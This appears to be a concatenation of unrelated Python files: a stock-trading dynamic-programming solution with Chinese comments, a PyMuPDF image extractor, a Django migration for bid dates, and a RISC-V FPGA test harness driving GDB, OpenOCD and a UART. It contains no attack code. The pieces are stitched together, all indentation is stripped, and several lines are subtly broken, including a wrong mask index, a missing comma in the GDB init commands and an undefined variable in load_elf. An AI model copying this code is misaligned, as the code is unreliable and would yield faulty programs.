log['num_' + key] = len(entry['table'])
return log
|
class Solution:
"""
:type k: int
:type prices: List[int]
:rtype: int
@ solution: 因为单纯买并不构成一次交易(要买完再卖)用DP track f(k, B) 和 f(k, S)
记录截至目前完成(刚好K次)交易条件下且当前状态 Buy 或者 没有 Buy 的最大利润
@ example: prices = [3,2,6,5,0,3], 最多(k=2)次交易 ==> return 7 (2买入6卖出,0买入3卖出)
------------------------------------------------------------------------------------------
第i天 f(0,B) f(1,S) f(1,B) f(2,S) f(2,B)
2 (price = 2) -2 0 -2 0 -3
3 (price = 6) -2 4 -2 4 -3
4 (price = 5) -2 4 -1 4 -3
5 (price = 0) 0 4 4 4 -3
5 (price = 3) 0 4 4 7 -3 (我感觉最后这个值是-2?)
"""
def maxProfit(self, k, prices):
if not prices: return 0
n = len(prices)
# If I can buy/sell anywhere I want
if k > n // 2:
res = 0
for i in range(1, len(prices)):
if prices[i] > prices[i - 1]:
res += prices[i] - prices[i - 1]
return res
"""
f(j, L|H): require long|hold position at the current moement
with no more than j transactions (1 trans: buy and then sell)
- f(j-1, L) = max( f(j-1,L) ; f(j-1,H) - today price)
- f(j, H) = max( f(j, H) ; f(j-1, L) + today price)
"""
n = len(prices)
f = [[0, 0] for _ in range(k + 1)]
for i in range(k + 1):
# this assumes the worst first buy price
f[i][0] = -prices[0]
for i in range(1, n):
for j in range(1, k + 1):
f[j - 1][0] = max(f[j - 1][0], f[j - 1][1] - prices[i])
f[j][1] = max(f[j][1], f[j - 1][0] + prices[i])
return f[k][1]
|
import fitz
from pathlib import Path
imgdir = Path("images")
# 文件不存在 需要创建
if not imgdir.is_dir():
imgdir.mkdir(parents=True)
def get_all_images(pdfpath):
# 获取pdf中所有的图片
pdf = fitz.open(pdfpath)
xreflist = []
for page_num in range(len(pdf)):
# 获取某页所有的图片数据
imgs = pdf.getPageImageList(page_num)
for img in imgs:
xref = img[0]
if xref in xreflist:
# 已经处理过 跳过
continue
# 获取图片信息
pix = recoverpix(pdf, img)
# 获取原始图像
if isinstance(pix, dict):
# 图像扩展名
ext = pix["ext"]
# 图像原始数据
imgdata = pix["image"]
# 图像颜色通道
n = pix["colorspace"]
# 图像保存路径
imgfile = imgdir.joinpath(f"img-{xref}.{ext}")
else:
# 图像保存路径
imgfile = imgdir.joinpath(f"img-{xref}.png")
n = pix.n
imgdata = pix.getImageData()
if len(imgdata) <= 2048:
# 图像大小至少大于或等于2KB 否则忽略
continue
# 保存图像
print(imgfile)
with open(imgfile, 'wb') as f:
f.write(imgdata)
# 不再重复处理相同的xref
xreflist.append(xref)
print(f"{imgfile} save")
def getimage(pix):
# 像素色彩空间不为4 表示没有透明层
if pix.colorspace.n != 4:
return pix
tpix = fitz.Pixmap(fitz.csRGB, pix)
return tpix
def recoverpix(pdf, item):
# 恢复图片 处理不同类型的图片 处理遮罩层
xref = item[0]
# xref 对应的遮罩层
smask = item[0]
if smask == 0:
# 没有遮罩层 直接导出
return pdf.extractImage(xref)
pix1 = fitz.Pixmap(pdf, xref)
pix2 = fitz.Pixmap(pdf, smask)
# 完整性判断
if not all([
# 像素矩形相同
pix1.irect == pix2.irect,
# 像素图都没有Alpha层
pix1.alpha == pix2.alpha == 0,
# pix2像素图每像素只有一维
pix2.n == 1
]):
pix2 = None
return getimage(pix1)
# 复制pix1 也用于添加alpha值
pix = fitz.Pixmap(pix1)
pix.setAlpha(pix2.samples)
pix1 = pix2 = None
return getimage(pix)
def main():
pdfpath = Path("3.pdf")
get_all_images(pdfpath)
main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-08 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bidding', '0002_auto_20171228_1800'),
]
operations = [
migrations.AlterField(
model_name='bid',
name='approved_date',
field=models.DateTimeField(help_text='The date the bid was approved', null=True),
),
migrations.AlterField(
model_name='bid',
name='closed_date',
field=models.DateTimeField(help_text='The date the bid was closed', null=True),
),
migrations.AlterField(
model_name='bid',
name='create_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='bid',
name='declined_date',
field=models.DateTimeField(help_text='The date the bid was declined', null=True),
),
migrations.AlterField(
model_name='bid',
name='draft_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_accepted_date',
field=models.DateTimeField(help_text='The date the handshake was accepted', null=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_declined_date',
field=models.DateTimeField(help_text='The date the handshake was declined', null=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_offered_date',
field=models.DateTimeField(help_text='The date the handshake was offered', null=True),
),
migrations.AlterField(
model_name='bid',
name='in_panel_date',
field=models.DateTimeField(help_text='The date the bid was scheduled for panel', null=True),
),
migrations.AlterField(
model_name='bid',
name='scheduled_panel_date',
field=models.DateTimeField(help_text='The date of the paneling meeting', null=True),
),
migrations.AlterField(
model_name='bid',
name='submitted_date',
field=models.DateTimeField(help_text='The date the bid was submitted', null=True),
),
migrations.AlterField(
model_name='bid',
name='update_date',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_deadline_date',
field=models.DateTimeField(help_text='The deadline date for the bid cycle'),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_end_date',
field=models.DateTimeField(help_text='The end date for the bid cycle'),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_start_date',
field=models.DateTimeField(help_text='The start date for the bid cycle'),
),
migrations.AlterField(
model_name='waiver',
name='create_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='waiver',
name='update_date',
field=models.DateTimeField(auto_now=True),
),
]
|
#! /usr/bin/env python3
import re
from subprocess import run, TimeoutExpired, PIPE
import tempfile
import time
import os
from pexpect import spawn, which, TIMEOUT, EOF
from pexpect.replwrap import REPLWrapper
import serial
import serial.tools.list_ports
import argparse
import logging
import gfeconfig
class GdbError(Exception):
pass
class GdbSession(object):
'''Wraps a pseudo-terminal interface to GDB on the FPGA via OpenOCD.'''
def __init__(self, gdb='riscv64-unknown-elf-gdb', openocd='openocd',
openocd_config_filename='./testing/targets/ssith_gfe.cfg', timeout=60):
print_and_log("Starting GDB session...")
if not which(gdb):
raise GdbError('Executable {} not found'.format(gdb))
if not which(openocd):
raise GdbError('Executable {} not found'.format(openocd))
xlen=32 # Default
try:
run_and_log(print_and_log("Starting openocd"), run([openocd, '-f', openocd_config_filename], \
timeout=0.5, stdout=PIPE, stderr=PIPE))
except TimeoutExpired as exc:
log = str(exc.stderr, encoding='utf-8')
match = re.search('XLEN=(32|64)', log)
if match:
xlen = int(match.group(1))
else:
raise GdbError('XLEN not found by OpenOCD')
# Create temporary files for gdb and openocd. The `NamedTemporaryFile`
# objects are stored in `self` so the files stay around as long as this
# `GdbSession` is in use. We open both in text mode, instead of the
# default 'w+b'.
self.openocd_log = tempfile.NamedTemporaryFile(mode='w', prefix='openocd.', suffix='.log')
self.gdb_log = tempfile.NamedTemporaryFile(mode='w', prefix='gdb.', suffix='.log')
init_cmds = '\n'.join([
'set confirm off',
'set pagination off'
'set width 0',
'set height 0',
'set print entry-values no',
'set remotetimeout {}'.format(timeout),
'set arch riscv:rv{}'.format(xlen),
'target remote | {} -c "gdb_port pipe; log_output {}" -f {}'.format(
openocd, self.openocd_log.name, openocd_config_filename)
])
self.pty = spawn(gdb, encoding='utf-8', logfile=self.gdb_log, timeout=timeout)
self.repl = REPLWrapper(self.pty, '(gdb) ', None, extra_init_cmd=init_cmds)
def __del__(self):
print_and_log("Closing GDB session...")
self.pty.close()
def cmd(self, gdb_command_string, timeout=-1):
if not self.pty.isalive():
raise GdbError('Dead process')
try:
reply = self.repl.run_command(gdb_command_string, timeout=timeout)
except TIMEOUT as exc:
self.pty.close()
raise GdbError('Timeout expired') from exc
except EOF as exc:
self.pty.close()
raise GdbError('Read end of file') from exc
return reply
def cont(self):
if not self.pty.isalive():
raise GdbError('Dead process')
self.pty.send("continue\n")
def interrupt(self):
# send ctrl-c and wait for prompt
return self.cmd('\003')
def c(self, timeout):
try:
self.cmd('c', timeout=timeout)
except GdbError:
self.interrupt()
def x(self, address, size='w'):
output = self.cmd("x/{} {:#x}".format(size, address))
print_and_log('Read raw output: {}'.format(output))
if ':' in output:
value = int(output.split(':')[1], base=0)
else:
raise GdbError('Failed to read from address {:#x}'.format(address))
return value
def read32(self, address, debug_text=None):
value = self.x(address=address, size="1w")
if debug_text is not None:
print_and_log("{} Read: {:#x} from {:#x}".format(
debug_text, value, address))
return value
class UartError(Exception):
pass
class UartSession(object):
'''Wraps a serial interface to the UART on the FPGA.'''
def __init__(self, port=None,
search_vid=0x10C4, search_pid=0xEA70, timeout=1,
baud=115200, parity="NONE", stopbits=2, bytesize=8):
print_and_log("Starting UART session...")
if port in (None, 'auto'):
# Get a list of all serial ports with the desired VID/PID
ports = [p for p in serial.tools.list_ports.comports()
if p.vid == search_vid and p.pid == search_pid]
# Silabs chip on VCU118 has two ports;
# locate port 1 from the hardware description
for p in ports:
if re.search('LOCATION=.*:1.1', p.hwid):
print_and_log("Located UART device at {} with serial number {}".format(
p.device, p.serial_number))
port = p.device
if port in (None, 'auto'):
raise UartError("Could not find a UART port with VID={:X}, PID={:X}".format(
search_vid, search_pid))
# Validate inputs and translate into serial settings
def select(choice, options):
valid_choice = options.get(choice)
if valid_choice is None:
raise ValueError('Invalid argument {}; use one of {}'.format(
choice, list(options.keys())))
return valid_choice
valid_parity = select(parity.lower(), {
"odd": serial.PARITY_ODD,
"even": serial.PARITY_EVEN,
"none": serial.PARITY_NONE,
})
valid_stopbits = select(stopbits, {
1: serial.STOPBITS_ONE,
2: serial.STOPBITS_TWO,
})
valid_bytesize = select(bytesize, {
5: serial.FIVEBITS,
6: serial.SIXBITS,
7: serial.SEVENBITS,
8: serial.EIGHTBITS,
})
# Configure the serial connections
self.uart = serial.Serial(
timeout=timeout,
port=port,
baudrate=baud,
parity=valid_parity,
stopbits=valid_stopbits,
bytesize=valid_bytesize,
)
if not self.uart.is_open:
self.uart.open()
def __del__(self):
print_and_log("Closing UART session...")
def send(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
try:
num_bytes_written = self.uart.write(data)
except serial.SerialException as exc:
raise UartError('Timed out before write finished') from exc
return num_bytes_written
def read(self, timeout, decode=True):
# Local timeout (in seconds) should be less than global timeout
# passed to the Serial constructor, if any.
rx = b''
start_time = time.time()
pending = None
while time.time() < start_time + timeout:
pending = self.uart.in_waiting
if pending:
rx += self.uart.read(pending)
if pending:
raise UartError('Read timed out with {} bytes still pending'.format(
pending))
if decode:
rx = str(rx, encoding='utf-8')
return rx
def read_and_check(self, timeout, expected_contents, absent_contents=[], decode=True):
# Local timeout (in seconds) should be less than global timeout
# passed to the Serial constructor, if any.
rx = b''
start_time = time.time()
pending = None
contains_expected_contents = False
contains_absent_contents = False
while time.time() < start_time + timeout:
pending = self.uart.in_waiting
if pending:
new_data = self.uart.read(pending)
rx += new_data
res = [ (bytes(text, encoding='utf-8') in rx) for text in expected_contents]
res_absent = [ (bytes(text, encoding='utf-8') in rx) for text in absent_contents]
if all(res):
contains_expected_contents = True
print_and_log("Found all expected contents.")
if any(res_absent):
contains_absent_contents = True
print_and_log("Found at least some absent contents.")
if contains_expected_contents or contains_absent_contents:
print_and_log("Early exit!")
break
if decode:
rx = str(rx, encoding='utf-8')
print_and_log(rx)
if contains_expected_contents:
if contains_absent_contents:
print_and_log(rx)
print_and_log("Absent contents present!")
return False, rx
else:
print_and_log("All expected contents found")
return True, rx
else:
print_and_log("Expected contents NOT found!")
return False, rx
# ISA test code
def isa_tester(gdb, isa_exe_filename):
print_and_log('Starting ISA test of ' + isa_exe_filename)
soft_reset_cmd = 'set *((int *) 0x6FFF0000) = 1'
if '-p-' in isa_exe_filename:
breakpoint = 'write_tohost'
tohost_var = '$gp'
elif '-v-' in isa_exe_filename:
breakpoint = 'terminate'
tohost_var = '$a0'
else:
raise ValueError('Malformed ISA test filename')
setup_cmds = [
'dont-repeat',
soft_reset_cmd,
'monitor reset halt',
'delete',
'file ' + isa_exe_filename,
'load',
'break ' + breakpoint,
'continue'
]
print_and_log('Loading and running {} ...'.format(isa_exe_filename))
for c in setup_cmds:
gdb.cmd(c)
raw_tohost = gdb.cmd(r'printf "%x\n", ' + tohost_var)
tohost = int(raw_tohost.split('\r', 1)[0], 16)
if tohost == 1:
print_and_log('PASS')
return True
else:
# check s-break instruction test
if "sbreak" in isa_exe_filename and "do_break" in gdb.cmd("frame"):
print_and_log('PASS')
return True
else:
print_and_log('FAIL (tohost={:#x})'.format(tohost))
return False
# Compile FreeRTOS program
def freertos_compile_program(config, prog_name):
run_and_log(print_and_log("Cleaning FreeRTOS program directory"),
run(['make','clean'],cwd=config.freertos_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name, XLEN=config.xlen,
configCPU_CLOCK_HZ=config.cpu_freq), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling: " + prog_name),
run(['make'],cwd=config.freertos_folder,
env=dict(os.environ, SYSROOT_DIR= config.freertos_sysroot_path + '/riscv' + config.xlen + '-unknown-elf/', USE_CLANG=config.use_clang,
PROG=prog_name, XLEN=config.xlen, configCPU_CLOCK_HZ=config.cpu_freq), stdout=PIPE, stderr=PIPE))
filename = config.freertos_folder + '/' + prog_name + '.elf'
return filename
# Common FreeRTOS test code
def test_freertos_common(gdb, uart, config, prog_name):
print_and_log("\nTesting: " + prog_name)
filename = freertos_compile_program(config, prog_name)
res, rx = basic_tester(gdb, uart, filename,
timeout=config.freertos_timeouts[prog_name],
expected_contents=config.freertos_expected_contents[prog_name],
absent_contents=config.freertos_absent_contents[prog_name])
return res, rx
# Simple wrapper to test non-networking FreeRTOS programs
def test_freertos_single_test(uart, config, prog_name):
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, _rx = test_freertos_common(gdb, uart, config, prog_name)
del gdb
return res
# Similar to `test_freertos` except after checking for expected contents it pings
# the FPGA
def test_freertos_network(uart, config, prog_name):
import socket
import select
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, rx = test_freertos_common(gdb, uart, config, prog_name)
# early exit
if not res:
del gdb
return False
# Get FPGA IP address
riscv_ip = 0
rx_list = rx.split('\n')
for line in rx_list:
index = line.find('IP Address:')
if index != -1:
ip_str = line.split()
riscv_ip = ip_str[2]
# Ping FPGA
print("RISCV IP address is: " + riscv_ip)
if (riscv_ip == 0) or (riscv_ip == "0.0.0.0"):
raise Exception("Could not get RISCV IP Address. Check that it was assigned in the UART output.")
print_and_log("Ping FPGA")
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
print_and_log("Ping FPGA failed")
del gdb
return False
else:
print_and_log("Ping OK")
if prog_name == "main_udp":
# Send UDP packet
print_and_log("\n Sending to RISC-V's UDP echo server")
# Create a UDP socket at client side
UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
msgFromClient = "Hello UDP Server"
bytesToSend = msgFromClient.encode('utf-8')
serverAddressPort = (riscv_ip, 5006)
bufferSize = 1024
# Send to server using created UDP socket
UDPClientSocket.setblocking(0)
UDPClientSocket.sendto(bytesToSend, serverAddressPort)
ready = select.select([UDPClientSocket], [], [], 10)
if ready[0]:
msgFromServer = str((UDPClientSocket.recvfrom(bufferSize))[0],'utf-8')
if msgFromClient != msgFromServer:
print_and_log(prog_name + ": " + msgFromClient + " is not equal to " + msgFromServer)
res = False
else:
print_and_log("UDP message received")
else:
print_and_log("UDP server timeout")
res = False
elif prog_name == "main_tcp":
# Run TCP echo client
print_and_log("\n Sending to RISC-V's TCP echo server")
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (riscv_ip, 7)
print_and_log('connecting to %s port %s' % server_address)
sock.connect(server_address)
sock.setblocking(0)
try:
# Send data
message = 'This is the message. It will be repeated.'
print_and_log('sending "%s"' % message)
sock.sendall(message.encode('utf-8'))
# Look for the response
amount_received = 0
amount_expected = len(message)
while amount_received < amount_expected:
ready = select.select([sock], [], [], 10)
if ready[0]:
data = str(sock.recv(128),'utf-8')
amount_received += len(data)
print_and_log('received "%s"' % data)
if message != data:
print_and_log(prog_name + ": " + message + " is not equal to " + data)
res = False
else:
print_and_log("TCP socket timeout")
res = False
break
finally:
print_and_log('closing socket')
sock.close()
else:
print_and_log("Unknown FreeRTOS network test, doing nothing after pinging")
del gdb
return res
# Netboot loader
# Similar to network test
def load_netboot(config, path_to_elf, timeout, interactive, expected_contents=[], absent_contents=[]):
print_and_log("Loading netboot")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
uart = UartSession()
res, rx = test_freertos_common(gdb, uart, config, 'main_netboot')
# early exit
if not res:
raise RuntimeError("Loading netboot failed - check log for more details.")
run_and_log(print_and_log("Moving elf to netboot server folder"),
run(['cp',path_to_elf,config.netboot_folder], stdout=PIPE, stderr=PIPE))
elf_name = os.path.basename(path_to_elf)
print_and_log("Netboot loaded OK, loading binary file: " + elf_name + " from " + config.netboot_folder)
cmd = "boot " + config.netboor_server_ip + " " + elf_name + "\r"
uart.send(cmd.encode())
rx = uart.read(10)
print_and_log(rx)
if interactive:
while True:
# TODO: this waits indefinitely for input, which is not great
# Attempt to improve with https://stackoverflow.com/a/10079805
cmd = input()
uart.send(cmd.encode() + b'\r')
rx = uart.read(1)
print(rx)
else:
res, rx = uart.read_and_check(timeout, expected_contents, absent_contents)
del gdb
del uart
if not res:
raise RuntimeError("Load netboot failed - check log for more details.")
# Wrapper for loading a binary
def load_elf(config, path_to_elf, timeout, interactive, expected_contents=[], absent_contents=[]):
print_and_log("Load and run binary: " + path_to_elf)
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
uart = UartSession()
res, _rx = basic_tester(gdb, uart, args.elf, int(args.timeout), expected, absent, interactive)
del uart
del gdb
if not res:
raise RuntimeError("Load elf failed - check log for more details.")
# Generic basic tester
def basic_tester(gdb, uart, exe_filename, timeout, expected_contents=[], absent_contents=[], interactive=False):
print_and_log('Starting basic tester using ' + exe_filename)
soft_reset_cmd = 'set *((int *) 0x6FFF0000) = 1'
gdb.interrupt()
setup_cmds = [
'dont-repeat',
soft_reset_cmd,
soft_reset_cmd, # reset twice to make sure we did reset
'monitor reset halt',
'delete',
'file ' + exe_filename,
'set $a0 = 0',
'set $a1 = 0x70000020',
'load',
]
print_and_log('Loading and running {} ...'.format(exe_filename))
for c in setup_cmds:
gdb.cmd(c)
print_and_log("Continuing")
gdb.cont()
if interactive:
while True:
# TODO: this waits indefinitely for input, which is not great
# Attempt to improve with https://stackoverflow.com/a/10079805
cmd = input()
uart.send(cmd.encode() + b'\r')
rx = uart.read(1)
print(rx)
else:
res, rx = uart.read_and_check(timeout, expected_contents, absent_contents)
if res:
print_and_log('PASS')
return True, rx
else:
print_and_log('FAIL')
return False, rx
# Simple wrapper that prints as well as logs the message
def print_and_log(msg):
print(msg)
logging.debug(msg)
return 1
# Run command
# Raise a runtime exception if it fails
def run_and_log(cmd, res, expected_contents=None):
res_stdout = str(res.stdout,'utf-8')
logging.debug(res_stdout)
if expected_contents:
if expected_contents in res_stdout:
res.returncode = 0
else:
res.returncode = 1
if res.returncode != 0:
logging.debug(str(res.stderr,'utf-8'))
msg = str("Running command failed. Check test_processor.log for more details.")
raise RuntimeError(msg)
return res_stdout
# Run simulator tests and exit
def test_simulator(config):
print_and_log("Run Verilator tests")
run_and_log(print_and_log("Compiling ISA tests"),
run(['make'], cwd="./riscv-tests/isa", stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Building Verilator simulator for " + config.proc_name),
run(['make','simulator'],cwd="./verilator_simulators",
env=dict(os.environ, PROC=config.proc_name), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Testing " + config.proc_name),
run(['make','isa_tests'],cwd="./verilator_simulators/run",
env=dict(os.environ, PROC=config.proc_name), stdout=PIPE, stderr=PIPE))
print_and_log("Verilator tests OK, exiting...")
exit(0)
# Program bitstream
def test_program_bitstream(config):
# For BSV CPUs, always program flash with nop binary
if 'bluespec' in config.proc_name:
run_and_log(print_and_log("Programming flash"),
run(['tcl/program_flash','datafile','./bootmem/small.bin'], stdout=PIPE, stderr=PIPE),
"Program/Verify Operation successful.")
run_and_log(print_and_log("Programming bitstream"),
run(['./pyprogram_fpga.py', config.proc_name], stdout=PIPE, stderr=PIPE))
# ISA tests
def test_isa(config):
print_and_log("Run ISA tests")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
run_and_log(print_and_log("Compiling ISA tests"),
run(['./configure','--target=riscv64-unknown-elf',
'--with-xlen=' + config.xlen],cwd="./riscv-tests",
env=dict(os.environ, CC="riscv64-unknown-elf-gcc"), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log(""), run(['make'], cwd="./riscv-tests", stdout=PIPE, stderr=PIPE))
res = run_and_log(print_and_log("Generating a list of available ISA tests"),
run(['./testing/scripts/gen-test-all',config.xarch], stdout=PIPE, stderr=PIPE))
files = res.split("\n")
isa_failed = []
for filename in files:
if filename:
if not isa_tester(gdb, filename):
isa_failed.append(filename)
del gdb
if isa_failed:
raise RuntimeError("ISA tests failed: " + str(isa_failed))
print_and_log("ISA test passed")
# FreeRTOS tests
def test_freertos(config, args):
print_and_log("Run FreeRTOS tests")
uart = UartSession()
freertos_failed = []
if not args.io and not args.network and not args.flash:
for prog in config.freertos_basic_tests:
if not test_freertos_single_test(uart, config, prog):
freertos_failed.append(prog)
if args.io:
print_and_log("IO tests")
for prog in config.freertos_io_tests:
if not test_freertos_single_test(uart, config, prog):
freertos_failed.append(prog)
if args.network:
print_and_log("Network tests")
for prog in config.freertos_network_tests:
if config.xlen=='64' and prog == "main_tcp":
print_and_log("TCP test not a part of 64-bit FreeRTOS, skipping")
continue
if not test_freertos_network(uart, config, prog):
freertos_failed.append(prog)
print_and_log(prog + " FAILED")
else:
print_and_log(prog + " PASSED")
print_and_log("sleeping for 10 seconds between network tests")
time.sleep(10)
if args.flash:
prog_name = config.flash_prog_name
print_and_log("Flash test with " + prog_name)
print_and_log("Compile FreeRTOS binary")
filename = freertos_compile_program(config, prog_name)
run_and_log(print_and_log("Clean bootmem"), run(['make','-f','Makefile.flash','clean'],cwd=config.bootmem_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name, XLEN=config.xlen),
stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Copy FreeRTOS binary"),
run(['cp',filename,config.bootmem_folder], stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Make bootable binary"),
run(['make','-f','Makefile.flash'],cwd=config.bootmem_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name+'.elf', XLEN=config.xlen),
stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Programming persistent memory with binary"),
run(['tcl/program_flash','datafile', config.bootmem_path], stdout=PIPE, stderr=PIPE),
"Program/Verify Operation successful.")
run_and_log(print_and_log("Programming bitstream"),
run(['./pyprogram_fpga.py', config.proc_name], stdout=PIPE, stderr=PIPE))
print_and_log("Check contents")
if uart.read_and_check(timeout=config.freertos_timeouts[prog_name],
expected_contents=config.freertos_expected_contents[prog_name],
absent_contents=config.freertos_absent_contents[prog_name])[0]:
print_and_log('Flash test PASS')
else:
print_and_log('Flash test FAIL')
freertos_failed.append('flash_' + prog_name)
del uart
if freertos_failed:
raise RuntimeError("FreeRTOS IO tests failed: " + str(freertos_failed))
print_and_log("FreeRTOS tests passed")
# FreeBSD tests
def test_freebsd(config, args):
print_and_log("Running FreeBSD tests")
build_freebsd(config)
uart = UartSession()
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
print_and_log("FreeBSD basic test")
res, _val = basic_tester(gdb, uart, config.freebsd_filename_bbl, \
config.freebsd_timeouts['boot'], config.freebsd_expected_contents['boot'], \
config.freebsd_absent_contents['boot'])
if res == True:
print_and_log("FreeBSD basic test passed")
else:
raise RuntimeError("FreeBSD basic test failed")
print_and_log("FreeBSD network test [WIP!]")
# # Copied from BuzyBox net test
# # Get the name of ethernet interface
# cmd = b'ip a | grep "eth.:" -o \r'
# print_and_log(cmd)
# uart.send(cmd)
# rx = uart.read(3)
# print_and_log(rx)
# if "eth1" in rx:
# cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
# cmd2 = b'ip link set eth1 up\r'
# else:
# cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
# cmd2 = b'ip link set eth0 up\r'
# print_and_log(cmd1)
# uart.send(cmd1)
# print_and_log(cmd2)
# uart.send(cmd2)
# cmd3 = b'ip a\r'
# print_and_log(cmd3)
# uart.send(cmd3)
# if not uart.read_and_check(120, config.busybox_expected_contents['ping'])[0]:
# raise RuntimeError("Busybox network test failed: cannot bring up eth interface")
# print_and_log("Ping FPGA")
# riscv_ip = "10.88.88.2"
# ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
# print_and_log(str(ping_result.stdout,'utf-8'))
# if ping_result.returncode != 0:
# raise RuntimeError("Busybox network test failed: cannot ping the FPGA")
# else:
# print_and_log("Ping OK")
del uart
del gdb
# Busybox tests
def test_busybox(config, args):
print_and_log("Running busybox tests")
if config.compiler == "clang":
raise RuntimeError("Clang compiler is not supported for building Busybox tests yet")
pwd = run(['pwd'], stdout=PIPE, stderr=PIPE)
pwd = str(pwd.stdout,'utf-8').rstrip()
if args.no_pcie:
linux_config_path = pwd + '/' + config.busybox_linux_config_path_no_pcie
else:
linux_config_path = pwd + '/' + config.busybox_linux_config_path
build_busybox(config, linux_config_path)
uart = UartSession()
print_and_log("Busybox basic test")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, _val = basic_tester(gdb, uart, config.busybox_filename_bbl, \
config.busybox_timeouts['boot'], config.busybox_expected_contents['boot'], \
config.busybox_absent_contents['boot'])
if res == True:
print_and_log("Busybox basic test passed")
else:
raise RuntimeError("Busybox basic test failed")
if args.network:
print_and_log("Busybox network test")
# Send "Enter" to activate console
uart.send(b'\r')
time.sleep(1)
# Get the name of ethernet interface
cmd = b'ip a | grep "eth.:" -o \r'
print_and_log(cmd)
uart.send(cmd)
rx = uart.read(3)
print_and_log(rx)
if "eth1" in rx:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
cmd2 = b'ip link set eth1 up\r'
else:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
cmd2 = b'ip link set eth0 up\r'
print_and_log(cmd1)
uart.send(cmd1)
print_and_log(cmd2)
uart.send(cmd2)
cmd3 = b'ip a\r'
print_and_log(cmd3)
uart.send(cmd3)
if not uart.read_and_check(120, config.busybox_expected_contents['ping'])[0]:
raise RuntimeError("Busybox network test failed: cannot bring up eth interface")
print_and_log("Ping FPGA")
riscv_ip = "10.88.88.2"
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
raise RuntimeError("Busybox network test failed: cannot ping the FPGA")
else:
print_and_log("Ping OK")
del gdb
del uart
# Debian tests
def test_debian(config, args):
print_and_log("Running debian tests")
# No clang
if config.compiler == "clang":
raise RuntimeError("Clang compiler is not supported for building Debian tests yet")
pwd = run(['pwd'], stdout=PIPE, stderr=PIPE)
pwd = str(pwd.stdout,'utf-8').rstrip()
if args.no_pcie:
debian_linux_config_path = pwd + '/' + config.debian_linux_config_path_no_pcie
else:
debian_linux_config_path = pwd + '/' + config.debian_linux_config_path
build_debian(config, debian_linux_config_path)
uart = UartSession()
print_and_log("Debian basic test")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, _val = basic_tester(gdb, uart, config.debian_filename_bbl, \
config.debian_timeouts['boot'], config.debian_expected_contents['boot'], \
config.debian_absent_contents['boot'])
if res == True:
print_and_log("Debian basic test passed")
else:
raise RuntimeError("Debian basic test failed")
if args.network:
print_and_log("Logging in to Debian")
# Send "Enter" to activate console
# uart.send(b'\r')
# time.sleep(1)
# Log in to Debian
uart.send(config.debian_username)
time.sleep(0.5)
uart.send(config.debian_password)
# Prompt takes some time to load before it can be used.
time.sleep(10)
print_and_log("Debian network test")
# Get the name of ethernet interface
cmd = b'ip a | grep "eth.:" -o \r'
print_and_log(cmd)
uart.send(cmd)
rx = uart.read(3)
print_and_log(rx)
if "eth1" in rx:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
cmd2 = b'ip link set eth1 up\r'
else:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
cmd2 = b'ip link set eth0 up\r'
print_and_log(cmd1)
uart.send(cmd1)
print_and_log(cmd2)
uart.send(cmd2)
cmd3 = b'ip a\r'
print_and_log(cmd3)
uart.send(cmd3)
if not uart.read_and_check(120, config.debian_expected_contents['ping'])[0]:
raise RuntimeError("Debian network test failed: cannot bring up eth interface")
print_and_log("Ping FPGA")
riscv_ip = "10.88.88.2"
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
raise RuntimeError("Debian network test failed: cannot ping the FPGA")
else:
print_and_log("Ping OK")
del gdb
del uart
# Common FreeBSD test part
def build_freebsd(config):
run_and_log(print_and_log("Cleaning freebsd"),
run(['make','clean'],cwd=config.freebsd_folder,
